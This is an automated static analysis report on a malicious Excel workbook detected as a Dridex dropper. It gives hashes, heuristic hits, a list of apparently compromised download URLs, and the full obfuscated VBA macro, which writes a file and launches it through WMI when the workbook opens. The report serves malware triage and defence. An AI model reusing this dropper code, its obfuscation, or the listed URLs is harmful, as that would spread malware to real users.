Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 07bfbdbb934f8346…

MALICIOUS

Office (OOXML)

568.4 KB Created: 2021-03-03 13:04:16 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2022-07-02
MD5: b22f59ae61f29489b476dc42bc9779be SHA-1: 18a2d07806b316f0c8e42b407a4a0f464303fdef SHA-256: 07bfbdbb934f834666d945a498701cae9444131ae5f10cf6ef6716917763cbde
240 Risk Score

Heuristics 8

  • ClamAV: Doc.Dropper.Dridex-9845759-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Dridex-9845759-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Zptr_55C_mLD2 = GetObject(QfXxqWD).SpawnInstance_
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    MPt9_VXy = Environ(VwIq7Cx8w)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://drlamyas.net/wp-content/plugins/LayerSlider/classes/Yn3TfEMzAJ.php In document text (OOXML body / shared strings)
    • https://rajbarishop.com/wp-includes/Requests/Exception/HTTP/p00j7fzRUR4g.phpIn document text (OOXML body / shared strings)
    • https://bemcorretora.com.br/plugins/system/redirect/form/KwFU4O19UGo.phpIn document text (OOXML body / shared strings)
    • https://coref.cd/wp-content/uploads/2016/10/5tBsg4akOUWz3V.phpIn document text (OOXML body / shared strings)
    • https://ingeconst.cl/wp/wp-includes/rest-api/endpoints/dTEo1JADIXXhd.phpIn document text (OOXML body / shared strings)
    • https://jhose21.com/ventas/libs/jquery-ui/external/byS943v3ps.phpIn document text (OOXML body / shared strings)
    • https://authenticmanagers.com.ng/mikano/vendors/switchery/dist/sClcPczJHlRp5z.phpIn document text (OOXML body / shared strings)
    • https://expressoquiririm.com.br/wp-content/plugins/contact-form-7/includes/DUmXYk6VPMo.phpIn document text (OOXML body / shared strings)
    • https://pmh.hr/wp-content/uploads/2017/10/rmoqZDe9qLLnu.phpIn document text (OOXML body / shared strings)
    • https://crm.sgdatapos.com/modules/goals/language/bulgarian/xo4dOLHR2TYyME.phpIn document text (OOXML body / shared strings)
    • http://www.w3.org/1999/XSL/TransformIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 13528 bytes
SHA-256: c3d22dc3c9241344f6aa065ff4cc35b659925c6687ee2fd9b996f346dcb749c1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
198 of 379 identifiers look randomly generated (e.g. 'xlCylinderBarStacked100') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
'DYnIt1yoGIWGV bzNLy_AiFn_bdaz_kIQ MOw5xCO y7bDw_fk0 pvZhOrhJUEZ rBJqjMGZDVtntbC RfPKt_0Oe_Cf6 kOSN_yt1_fT4 mVEP_oUOC_uWo
ILVxWKs = Join(Array(Ffnz_mBM_t43_BUV, F3QK_5w1a & "L9n8G_z1cx_YuE", "A7hms_UFg Wh00Yzl4XoRA2ovC" & "HOIs_V6j_Qif" & "AzeC1TfVeQj2IDM", mL8MwMGXCuj & "iA39k8m SUQbR_f0eu_pm7_qWJp e3kCI6jo7aPj" + "roOo_U5c_IKiB_hWb BAmV_M8sK Fbga_Fnyx", "bykaB0uW" & LQ8Ea_oI2e + SYWqnXK7jKD, "CHEfGFzlgpEf5t3", "N026T414f J210dtaC" + "G3G70_70x_J1c_ix5j XZ0z5TPbmoj ZSUNg_MX3N_16e_lfe" + "ZXfK_z0r_0jj_0Baz", "Lpcp_r6KN eknYa_Ubz" & "awiua7xXgLCgpT"))
vFVx0LMHOzzByE = YWrl9OdTIroRKLlu.zr0MT_2t4p_MvjZ
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "YWrl9OdTIroRKLlu"
Attribute VB_Base = "0{C79D48C3-D899-46F6-B515-8368F78E1F0E}{293607B5-1B3D-4D58-9A52-84940DD76A66}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function zr0MT_2t4p_MvjZ()


'UGOMMBqSqyXzGKN qP1Cj_mxh XwqF_zlNO_0Vmv WSVC_gR3r_IPLi qjsru_m1g o1b99_h2V_7E6I JQwcw_wrb_6Cv F8OO_43E8_0qS_oBj o5v5M_cA0f
Dim NFpkWodGRPV As String
NFpkWodGRPV = X0bucocBPr4.CFHbt_xcjN_59W.Text
Kb9FOUMQxIELDbyQZ = EIC8LsOj0 & MPt9_VXy(YWrl9OdTIroRKLlu.pOkjn_kMt9_VWpE_5lRM) & P1rg_wyt0 & YWrl9OdTIroRKLlu.DGAR_1itd_Pnh_usj & JHm4_SD7_aMv2_UaXz & Xqau_0vEd_W1my_Qqb & T3KRIN3mIA9tt & Ia6pg_WVO_cTKh & PCAkbg9LVYYn83SK.p92QzU80 & IZbrn3eX & LS0U8rxIE & M5TML_rxYA_xD6_3smJ.O8s0m_q7yG_XrkS
Open Kb9FOUMQxIELDbyQZ For Binary As #CLng((xlKatakana Xor xlAsRequired))
LOyrL582sv53 = YX1hf_euZ4_UGr
Put #CLng((xlNoButton Xor xlDirect)), , NFpkWodGRPV
Close #CLng((xlDatabase And xlOutline))
MZUpf_qHD_yLpQ = IgizgClhgjRj.Mbg8_e2OW_GFw8(YWrl9OdTIroRKLlu.H8eWVhl329uuPQQc(WdK1_tH8_PDA_Ggz), X0bucocBPr4.O2LiGUGb(Wq4UjmG0Od8F0rAr) & Kb9FOUMQxIELDbyQZ & Chr(34), AzQN4ANO8smLkQ.Zptr_55C_mLD2(X0bucocBPr4.T9Eob_PPL7_MkKy(Hs0meitS)))
Po2m_WEvJ = Len(Join(Array(J8J8FGb36ohk8pr ^ GO4eFOBPo & "hz392EaSPSN1bb0", YOR0CvCD, "LHyP2KwdeVJ2 WqzVc2Krr", KceObKwplai8, PuXoZKdB7hZKwQ & DKmuolvj)))
End Function
Function H8eWVhl329uuPQQc(AGWUKa0eKE0sK)
H8eWVhl329uuPQQc = Join(Array(Chr(CLng((Not (-545 + (0.361087510620221 * 1177))))) & ChrW(CLng(((0.772340425531915 * 940) + -621))) & Chr(CLng((AscW("n")))) _
 & Chr(CLng((AscW("m")))) & ChrW(CLng(((0.176258992805755 * 556) Or (4.50867052023121E-02 * 865)))) _
 & Chr(CLng((0.475982532751092 * xlDialogDefineStyle))) & Chr(CLng((Not (0.111854684512428 * -1046)))) & Chr(CLng((Not -116))) & ChrW(CLng(((xlDialogSeriesOptions + -525#) Or xlClipboardFormatToolFacePICT))) & Chr(CLng(((0.16802906448683 * -1101) + 299))) _
 & Chr(CLng((Asc("o")))) _
 & ChrW(CLng((-105 + (-0.815094339622642 * -265)))) _
 & ChrW(CLng((AscW("t")))) & ChrW(CLng((624 + -532))) _
 & Chr(CLng((9.36613055818354E-02 * 1057))) & Chr(CLng((AscW("i")))) & Chr(CLng((AscW("m")))) & ChrW(CLng((xlDialogMove + (-350 - -206#)))) & Chr(CLng((((-985 + 985.454297407913) * -1466) + 716))) & Chr(CLng((xl3DColumnStacked100 Or xlLinkStatusMissingSheet))) & Chr(CLng((((545 + 263#) - 744#) Or xlRangeAutoFormatReport3))) & Chr(CLng((AscW("i")))) & Chr(CLng((xlDialogWorkbookUnhide + (0.332928311057108 * (-1051 - -228#))))) & Chr(CLng((((1.47763157894737 * 760) + -890#) - 182))) _
 & ChrW(CLng((AscW(xlExtractData)))) _
 & Chr(CLng(((847 - 752#) And xlDialogRowHeight))) & ChrW(CLng(((0.215873015873016 * 315) Xor xlTextWindows))) & Chr(CLng((Asc("r")))) & ChrW(CLng((9.25 * xlLeftBrace))) _
 & Chr(CLng((AscW("c")))) & Chr(CLng(((0.118823529411765 * 850) Or xlRangeAutoFormatTable6))) _
 & ChrW(CLng((Asc("s")))) _
 & ChrW(CLng(((xlDialogReplaceFont - 133.735023041475) * xlDialogPivotFieldUngroup)))))
YjbM_bam_NJke_hseP = Weekday(gNRJ5RRkJFS)
End Function
Function DGAR_1itd_Pnh_usj()
DGAR_1itd_Pnh_usj = Join(Array(ChrW(CLng((-0.127777777777778 * -720))) _
 ))
End Function
Function pOkjn_kMt9_VWpE_5lRM()
pOkjn_kMt9_VWpE_5lRM = Join(Array(Chr(CLng(((xlDialogEditionOptions - 150#) And xlCylinderBarStacked100))) _
 + Chr(CLng((((1.02497502497502 * 1001) + -912#) Xor xlPlusValues))) + Chr(CLng((xlPrintInPlace Or xlCylinderBarStacked))) + ChrW(CLng((xlConeColStacked Or xlButtonControl))) _
 + Chr(CLng((0.306962025316456 * 316))) + Chr(CLng((116 And xlDialogRowHeight))) + ChrW(CLng((1026 - 929)))))
Debug.Print yDXnM_EPpz_SKDu
End Function
Function MPt9_VXy(VwIq7Cx8w)
For GQId45sFY5AFc = 0 To CLng((Not ((0.161803713527851 * 1131) - 805#)))
I05QjdBxaIRT = GQId45sFY5AFc
Next GQId45sFY5AFc
'pYPos_rho_9mQ ROy4yJVOtys BBbS3_fyQ O7GT_4k52_G06r Hprz_455K QilUKeupksfGBT8
qhBR_GOhr_Txo = mVKQ_j1a_46q
W77yoHVL = Array("m24thc5tFl7 PjkZZ_bVUg_qd9G R7jlgLUWl" & DDY9_qwHm_V3r & SvSV_m9Eb_W4o_cgju, YizU_T3jQ_h6Gf_kbqa + VRfX_V0pL_akOJ_2X8P & "K9gbV_5xfi Z5KkP_4iD_nCx4 dnvz_mIW", NG5UClgRaAQkPrl + ZIIONcbYM, "ia2JZ3jndPMO" & vJ5O_FkY_7qH_IBm)
mpFY3Q4tGlW = GNgzocfWEMBIhQ
Amt2_tIF_Sto_5Pvp = Split(PHlRZ_YJa_zOg_qwD, vjNYt_Rd1_F2qH, HCZUu_3Nq_4fj)
MPt9_VXy = Environ(VwIq7Cx8w)
YdO0qWxgS = CLng((Not -248)) > CLng((Asc("Z")))
QGhm_76m_iHn = Weekday(A2VD_IrgD_qn5_QY5c)
TQOEZ_dM7_rxgT_8cT = Abs(CLng(((410 - -655#) Or (1.17746262935991 * 2609))))
zf4h_v6v0 = YwoFDHWM
X46DD0K = Len(Join(Array(QJAyqZFmXce0BwVx, "PK61B_UbR ZLuN_unlS", "RT8H_Kxod_po8R_cQy JgYZ7G3tfXv" & "hJIqH0diBPlK0Q WsrFNLd", AS5AnrQYjTOr & "B0FHmqHf1RDKFJ", HohqjuAb & "bRMWvozOC FIZV1_w13_5Om_lEgE Dg0D_MjH" + "eZqs_KNEe_GTc_tCrJ XORdX_7f9 FhqL2xxiteYKjdNt", utLL_MaP_BvZ & "sZ8m177SmQEH9gHbZ")))
mKxbJR3gAlpGzE06 = Replace(ZEnFM7TCI5xWgGn, gt4IdjMH, TzxggvQn07J0fZ)
mJJNrlsBNaNyKHB = Join(Array(G0kW_0xB, X6OmrJhIlKDDbst + EwU0bgchXGpstOt, "Qm97_QDap_T6bF K6u8_rIe_M9dB_0h74" + "ZVVX_iWS Ebe5YUNtdAg UKw7r_m6sJ_IIW" & "O7ah_TKlU_2uw_xqOo WT8qpGbjIAT", R0dYuKdJST0x & "ATOAE_cBVu_dWTN S7nBH_Yee_xyt_KaG7", zmN5w07T, KfqW_qk0 & "kfZif_38H9_xk3o_BI3" & wwg0n_jyz2_tVX_hR85, "VG6R_EZAI_Cwg EUh3RhUOthTn" & UBpyLlSDcZJ - Plv3F_8oUI_GII_zYxX))
Ri0Xr8vqxhog4LI = CLng((-0.540849673202614 * -612)) < CLng(((0.622304050499737 * -1901) + xlDialogUnhide))
wFNvNzS6he0e = Join(Array(S01A3_1oLY_ZnY_6wA ^ VGf0r_eP0_DKCg & QQ4rI_M4z, NTI1c7dZ0aoR & "MD2Cq_rJKA_iby_AqM", G3hKA_JhAW_4nn3 * h0N2ZUtUft8))
End Function

Attribute VB_Name = "PCAkbg9LVYYn83SK"
Attribute VB_Base = "0{3ED9202C-982F-4B38-9507-D84A0E88DDD2}{973B3331-844A-4459-9A31-C5A61EFBF0A9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function p92QzU80()
p92QzU80 = Hex(CLng((CLng((((122461 - -529#) - 117#) And 87659)) - CLng((24352 Xor 53915)) + CLng((56767 And (36806 - -53#)))) * Rnd + CLng((36673 + -390))))
End Function
Function Qzx3_Sqf_pwN()
Qzx3_Sqf_pwN = Join(Array(ChrW(CLng((xlRangeAutoFormatTable7 And (0.105809128630705 * 482))))))
End Function

Attribute VB_Name = "M5TML_rxYA_xD6_3smJ"
Function O8s0m_q7yG_XrkS()
O8s0m_q7yG_XrkS = Join(Array(ChrW(CLng(((-1.67777777777778 * -90) + -105))) _
 & ChrW(CLng(((2.61607183733265E-04 * (-1428 - -861#)) * -809))) _
 & ChrW(CLng((xlSourceAutoFilter Or (xlDialogLabelProperties - 321#)))) _
 & ChrW(CLng((Asc("l"))))))
Tnz1_V8G_QS0 = Ey1JD66oz
Debug.Print JpNWFbny
End Function


Attribute VB_Name = "X0bucocBPr4"
Attribute VB_Base = "0{F72CD3FE-D863-40DE-822E-77873993641D}{946DAE10-BF0E-484E-A26C-73081140D0FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function T9Eob_PPL7_MkKy(OTir_Q5a)
T9Eob_PPL7_MkKy = Join(Array(Chr(CLng((AscW("w")))) + Chr(CLng((Not ((0.725862068965517 * -580) - -315#)))) + ChrW(CLng((AscW("n")))) _
 + ChrW(CLng((Asc("m")))) _
 + ChrW(CLng((xlMetric Xor xlPieOfPie))) _
 + Chr(CLng((xlTableBody Or ((1910 - 825#) + -984#)))) + Chr(CLng((-309 + (-1.26112759643917 * -337)))) + Chr(CLng((AscW("s")))) _
 + ChrW(CLng((519 - ((-542 - -543.945147679325) * 237)))) + Chr(CLng((Not -93))) + ChrW(CLng((AscW("r")))) + Chr(CLng((Asc("o")))) + ChrW(CLng((((1182 + -876#) - 305.525641025641) * 234))) + Chr(CLng((357 + (-281 + 40#)))) + Chr(CLng((Not (0.105322763306908 * -883)))) + Chr(CLng((0.103448275862069 * 957))) + Chr(CLng(((-239 - -343#) Or xlCylinderBarStacked100))) + Chr(CLng((0.439516129032258 * 248))) + Chr(CLng((Not -119))) + ChrW(CLng((AscW(xlExpression)))) _
 + ChrW(CLng((-61 - -119))) + Chr(CLng((xlDialogFillGroup + (-0.224206349206349 * xlDialogSeriesShape)))) + Chr(CLng(((10.9358974358974 * -78) + 958))) + Chr(CLng((xlPyramidBarStacked Or (0.132780082987552 * (0.35080058224163 * xlDialogWebOptionsFonts))))) + ChrW(CLng((-335 - (xlDialogPrintPreview - (0.69327251995439 * 877))))) + ChrW(CLng((648 - (245 - -353#)))) + Chr(CLng((Not ((-1.01822192995482E-03 * -799) * -118)))) + Chr(CLng((AscW("P")))) _
 + ChrW(CLng((652 + (-374 + -164#)))) + ChrW(CLng((AscW("o")))) + Chr(CLng((766 - xlDialogNewWebQuery))) + Chr(CLng((xlAnyGallery Xor (xlDialogFormatChart + (-3.16216216216216 * xlPyramidBarStacked100))))) + Chr(CLng((AscW("s")))) + Chr(CLng(((503 + -400#) Xor xlClipboardFormatBIFF3))) + Chr(CLng((xlDownBars Xor (-8.88610763454318E-02 * -799)))) + Chr(CLng((AscW("t")))) + Chr(CLng((xlDialogNew Xor (-639 + 661#)))) + ChrW(CLng(((581 + -483#) Or (xlDialogCombination + -57#)))) _
 + ChrW(CLng((-0.261261261261261 * -444))) + ChrW(CLng((AscW("u")))) + ChrW(CLng((AscW("p"))))))
BgffJDjV = Array("T94ZQ_QBB_rnf4_ox0W MFr1bNuTt", "KrObWNDh EqaOvAjG ZYeoOMJ3d" & I1d3_pi0_C8Fe_447, "aSWO_yjn")
Gt29d_CYwl_hoFu = Weekday(JLT3_CV2v_heb)
End Function
Function O2LiGUGb(IDgdgFbVHl0hU)
O2LiGUGb = Join(Array(ChrW(CLng((xlPieOfPie Or xlDialogInsert))) _
 & ChrW(CLng((Not -110))) & Chr(CLng((Not (592 + -698#)))) & Chr(CLng(((749 - 715#) Or xlCylinderBarStacked100))) _
 & ChrW(CLng((824 - 792))) & Chr(CLng(((-5.3202614379085 * -153) + (-696 - 7#)))) & ChrW(CLng((922 + -807))) _
 & Chr(CLng((-205 + 237))) _
 & Chr(CLng((-138 + (761 + -520#)))) _
 & Chr(CLng(((-0.198333333333333 * -600) And xlPyramidBarClustered))) & Chr(CLng(((930 - 844#) Xor (168 - 134#)))) _
 & ChrW(CLng(((359 + -324#) Xor xlWPG))) & ChrW(CLng((xlRangeAutoFormatTable2 Xor xlDrawingObject))) _
 & ChrW(CLng(((-0.164763458401305 * (1.33260869565217 * -460)) Xor xlNotYetReviewed))) & ChrW(CLng((AscW("o")))) _
 & Chr(CLng((115 And 122))) & Chr(CLng((AscW("m")))) & Chr(CLng((Not (448 - 546#)))) _
 & Chr(CLng((AscW("t")))) & Chr(CLng(((-656 - -688#) Or xlIntlAddIn))) _
 & Chr(CLng((-125 + (1.60606060606061 * xlConeColClustered)))) _
 ))
End Function


Attribute VB_Name = "AzQN4ANO8smLkQ"
Function Zptr_55C_mLD2(QfXxqWD)
Set Zptr_55C_mLD2 = GetObject(QfXxqWD).SpawnInstance_
KVhioDHjR = Split(DTh1_UjVU_WlT, NDE4_bzR_uHLh_ACi, C15h_1FNH_nUaV_nak)
Zptr_55C_mLD2.ShowWindow = CLng((Not (-132 - (658 + -777#))))
VR4bC_qNw = Replace(Ho4kALrv, qPKl_Sin_9BH, SS1L6_gOXl)
nrfo_EKsc = CLng((Not (-1031 + 397#))) > CLng((xlDialogActiveCellFont Xor (-0.195448460508701 * (xlCylinderCol + -845#))))
End Function

Attribute VB_Name = "IgizgClhgjRj"
Attribute VB_Base = "0{B1B897E9-9067-4160-8996-278990E7EC75}{0E77E6AA-E8E3-47F7-8F40-262413E140C4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Mbg8_e2OW_GFw8(X5ox_iWyc_Vxr_GuEw, PBuJ_ULKc_nyc2, OgxD_HFC_uOx)
Debug.Print LPLc_qR1
dizJJlAi = Weekday(FWczYT8L)
tR7mq4sYWK4Jg = Split(ZGUL3NPKocAT0, ADYSrjbXP00R, JXBNS2DLH6EY)
'znVx_zlkT_0o9_c0D YzO5mYVvPb ssqhbpX8eZb6nS eyZz_D3Yk MYuyqIX VYNvn9H J0VXo3haIfVfB0FK pnas_Fmf
Qclg_2vMF_Ken7 = InStr(Hk2RWfcw, ndCGV_H4Y_dko_cQW, Ugpkg_5ub_SjrA_S76E)
S6U6GomBFu5c = Year(QSdRvWH7)
Svft_03gj_Wd8C = Split(bqfa0vpy, UTk8_e1y_ZVaz, slfgza7)
N6DwA_3k4_eaj = MzgAIwjO0n2ORuMt
'x5ThLRTx eRS4_73Dm_K0vd Mg7AQs8VEdV O6SgP_6Ea_Pcj_e0h KIyea_6U5i UHw3_gK6_Dw2k_GLTW nHdlG1ZFwtBToX
For M9SStvZ9nqeAKx = 0 To CLng((4.61797752808989 * 267))
P9kviSG7C2sxs = M9SStvZ9nqeAKx
Next M9SStvZ9nqeAKx
With GetObject(X5ox_iWyc_Vxr_GuEw)
COoPoAo = Year(A5Bk_0ZS5_FLj_LJsa)
cJhb_vLk = Len(Join(Array("YfMFPfkrV jYLh_E2MI" & IFo9_ZJM_XS2_6SA & q7ZRcPJ0)))
.Create PBuJ_ULKc_nyc2, Null, OgxD_HFC_uOx
End With
HXlnfnZXFRe = InStr(jVqX2_bwf, Y4YlM_4kgD_T2Z_F0IZ, EZ20_pRMI)
UlJbnNz4tb0yzN = Year(PX9HQRFK)
'A8zu_reV_6Qkn VsAztDqY2DY0zuh3N BQCE_X6CG D0tH_p5J_S9eQ_Uh1 cL9Ke_QBR_lfW_LQJq
z7q6V_tpI = CLng((xlBarClustered And (-36 + 99#))) > CLng(((250 + 771#) + -622))
oTXKgffexLG = "nzsy_XVDj_aYh_okXx"
I79VaFXmNC8 = InStr(SHrl_ZPV, zi2KR_Xt3_JIVC_DRO, b7M0lTJkNJmAX)
u8J0IH08F = Weekday(ELsNu_0ajk_CMk)
'vCh6_vPTd VDXiuvG9o9CR LljMeS8 FMF4w_WK1U e7mUJCgttQ5gI0 KrJcPkqEHm6xU hm7aS_ZyD7_nfnk_IW79
End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 60928 bytes
SHA-256: 864b468501aa7bf6819c5ecfed94c374be3aab739e5e1c8bcc5a30f81c3b6ca5
Detection
ClamAV: Doc.Dropper.Dridex-9845759-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.